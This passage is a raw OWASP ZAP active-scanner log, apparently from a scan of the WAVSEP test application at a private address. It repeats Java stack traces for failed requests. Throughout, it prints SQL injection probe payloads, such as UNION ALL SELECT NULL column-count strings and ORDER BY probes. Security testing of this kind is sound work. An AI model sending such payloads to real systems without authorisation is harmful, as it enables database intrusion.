at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680460 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680462 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680464 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680465 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680466 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680468 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 5138#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 5138# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680468 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 